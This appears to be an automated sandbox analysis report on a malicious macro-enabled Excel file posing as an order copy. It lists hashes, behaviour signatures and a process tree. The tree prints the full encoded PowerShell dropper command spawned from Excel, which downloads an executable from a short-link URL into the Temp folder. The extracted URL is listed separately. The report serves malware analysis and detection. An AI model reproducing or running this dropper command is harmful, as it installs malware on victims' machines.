Analysis

  • max time kernel
    139s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    26-03-2021 16:21

General

  • Target

    ORDER COPY-326.xlsm

  • Size

    154KB

  • MD5

    9a30f275af39b20ce59988b3c1724a68

  • SHA1

    d35c17ba0c5f09cb212e0a50d117b91d278ec6b3

  • SHA256

    7fe87c98f71cb7cfad4b7713284b7cfe1a0a5e059d5eb5e2c1b322426a6e52ff

  • SHA512

    7898565b62505be720c625899fd3b9f1fb9338a8653066f2c9bf660a1f59fa16529ce4c8e6c1ee597fc3855992ca1e522dce536790c8268ca75684f79636031d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cutt.ly/fxD7Hr0

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORDER COPY-326.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:496
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3532
      • C:\Windows\system32\cmd.exe
        cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4080

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/496-2-0x00007FF7DFCE0000-0x00007FF7DFCF0000-memory.dmp
    Filesize

    64KB

  • memory/496-3-0x00007FF7DFCE0000-0x00007FF7DFCF0000-memory.dmp
    Filesize

    64KB

  • memory/496-4-0x00007FF7DFCE0000-0x00007FF7DFCF0000-memory.dmp
    Filesize

    64KB

  • memory/496-5-0x00007FF803080000-0x00007FF8036B7000-memory.dmp
    Filesize

    6.2MB

  • memory/496-6-0x00007FF7DFCE0000-0x00007FF7DFCF0000-memory.dmp
    Filesize

    64KB

  • memory/2812-8-0x0000000000000000-mapping.dmp
  • memory/3532-7-0x0000000000000000-mapping.dmp
  • memory/4080-9-0x0000000000000000-mapping.dmp
  • memory/4080-10-0x00007FFFF9D20000-0x00007FFFFA70C000-memory.dmp
    Filesize

    9.9MB

  • memory/4080-11-0x000001EBD5F80000-0x000001EBD5F81000-memory.dmp
    Filesize

    4KB

  • memory/4080-12-0x000001EBD6130000-0x000001EBD6131000-memory.dmp
    Filesize

    4KB

  • memory/4080-13-0x000001EBD5F70000-0x000001EBD5F72000-memory.dmp
    Filesize

    8KB

  • memory/4080-14-0x000001EBD5F73000-0x000001EBD5F75000-memory.dmp
    Filesize

    8KB

  • memory/4080-15-0x000001EBD5F76000-0x000001EBD5F78000-memory.dmp
    Filesize

    8KB